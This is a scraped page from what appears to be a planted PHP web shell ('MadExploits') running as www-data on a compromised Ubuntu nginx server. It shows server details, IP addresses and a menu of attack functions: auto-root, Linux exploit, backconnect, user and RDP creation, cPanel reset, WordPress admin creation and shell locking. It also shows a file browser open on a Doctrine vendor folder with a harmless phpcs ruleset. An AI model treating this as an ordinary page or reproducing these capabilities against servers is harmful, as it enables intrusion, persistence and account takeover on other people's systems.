Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
vendor /
doctrine /
instantiator /
[ HOME SHELL ]
Name
Size
Permission
Action
docs
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.doctrine-project.json
544
B
-rw-r--r--
CONTRIBUTING.md
1.01
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
README.md
1.75
KB
-rw-r--r--
composer.json
1.41
KB
-rw-r--r--
phpbench.json
101
B
-rw-r--r--
phpcs.xml.dist
1.56
KB
-rw-r--r--
phpstan.neon.dist
574
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpcs.xml.dist
<?xml version="1.0"?> <ruleset> <arg name="basepath" value="."/> <arg name="extensions" value="php"/> <arg name="parallel" value="80"/> <arg name="cache" value=".phpcs-cache"/> <arg name="colors"/> <!-- Ignore warnings, show progress of the run and show sniff names --> <arg value="nps"/> <file>src</file> <file>tests</file> <rule ref="Doctrine"> <exclude name="SlevomatCodingStandard.TypeHints.DeclareStrictTypes"/> <exclude name="SlevomatCodingStandard.TypeHints.TypeHintDeclaration.MissingParameterTypeHint"/> <exclude name="SlevomatCodingStandard.TypeHints.TypeHintDeclaration.MissingReturnTypeHint"/> <exclude name="SlevomatCodingStandard.Exceptions.ReferenceThrowableOnly.ReferencedGeneralException"/> </rule> <rule ref="SlevomatCodingStandard.Classes.SuperfluousAbstractClassNaming"> <exclude-pattern>tests/DoctrineTest/InstantiatorTestAsset/AbstractClassAsset.php</exclude-pattern> </rule> <rule ref="SlevomatCodingStandard.Classes.SuperfluousExceptionNaming"> <exclude-pattern>src/Doctrine/Instantiator/Exception/UnexpectedValueException.php</exclude-pattern> <exclude-pattern>src/Doctrine/Instantiator/Exception/InvalidArgumentException.php</exclude-pattern> </rule> <rule ref="SlevomatCodingStandard.Classes.SuperfluousInterfaceNaming"> <exclude-pattern>src/Doctrine/Instantiator/Exception/ExceptionInterface.php</exclude-pattern> <exclude-pattern>src/Doctrine/Instantiator/InstantiatorInterface.php</exclude-pattern> </rule> </ruleset>
Close